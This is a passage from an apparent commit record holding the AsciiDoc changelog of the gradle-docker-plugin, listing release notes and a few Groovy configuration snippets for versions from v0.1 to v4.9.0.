105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Added Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. The underlying API no longer provides\nsetting port bindings for task `DockerStartContainer`; they 
need to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - {uri-github}\/issues\/75[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2015)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. 
Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly adding user-based instructions to the `Dockerfile` task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0f1b4c310ce92cadf04caf2bed3755ae7870561","subject":"Update 50-changes.adoc","message":"Update 50-changes.adoc","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v4.9.0 (TBA)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is no longer injected into the method `runRemoteCommand` - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]
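\n\nA hypothetical sketch of the Spring Boot extension properties mentioned above (values are illustrative; the exact DSL may differ between versions):\n\n[source,groovy]\n----\ndocker {\n    springBootApplication {\n        maintainer = 'Jane Doe'                 \/\/ introduced in v4.8.1\n        jvmArgs = ['-Xmx256m', '-XX:+UseG1GC']  \/\/ introduced in v4.8.0\n    }\n}\n----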
\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when 
accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/709[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* 
\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure-proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc.) but will eventually have all its keys\/values resolved to Java strings. - {uri-github}\/pull\/617[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/617[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDEs. - {uri-github}\/pull\/617[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When the plugin is applied to sub-projects, we will additionally search the rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars`, which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables (see the sketch below). - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. Its `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]
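\n\nA minimal sketch of the additive `withEnvVar` helper, one call per variable (the image ID and values are placeholders, and the closure-style `targetImageId` is assumed from this plugin generation's task API):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerCreateContainer\n\ntask createAppContainer(type: DockerCreateContainer) {\n    targetImageId { 'example-image-id' }\n    withEnvVar('DB_HOST', 'db.example.com')\n    withEnvVar('DB_PORT', '5432')\n}\n----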
\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained the ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to the Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()`, which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional; if NOT defined, it will fall back to checking whether the container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding the new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fall back to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow the user to define a list of successful exit codes the exec is allowed to return, failing if the actual code is not in the list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer`, which will poll, for some defined amount of time, a running container's logs looking for a given message, and fail if it is not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and, if that does not succeed in time, issue a stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` had been renamed in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache the `docker-java` client instead of recreating it for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences, and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create the file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during Gradle's configuration phase (see the sketch below). - {uri-github}\/pull\/552[Pull request 552]
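\n\nA hedged sketch of the post-change usage, where the stream is only opened at execution time (the file name is illustrative):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.DockerLoadImage\n\ntask loadImage(type: DockerLoadImage) {\n    \/\/ evaluated lazily when the task runs, not during the configuration phase\n    inputStream = { new FileInputStream(new File(buildDir, 'myapp-image.tar')) }\n}\n----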
\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK`, then fall back to using the generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with a null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump version of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor of the jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standards - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM, except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump version of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump version of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]
\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump version of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()`, which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags`, which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures' call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer, which allows inspecting an exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`; instead, the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump version of docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per single ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks (see the sketch below) - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]
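\n\nTogether, the v3.0.5 and v3.0.4 entries give every task per-item and error callbacks. A minimal sketch against `DockerLogsContainer` (the container ID is a placeholder, and the `follow` option is assumed from that task's log-streaming settings):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerLogsContainer\n\ntask tailContainer(type: DockerLogsContainer) {\n    targetContainerId { 'example-container-id' }\n    follow = true\n    onNext { message -> logger.quiet message.toString() }   \/\/ one call per log frame\n    onError { error -> logger.error 'Log streaming failed', error }\n}\n----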
\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from the docker engine when a build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups, as well as defaulting to the alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required, make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert an extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fall back to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task 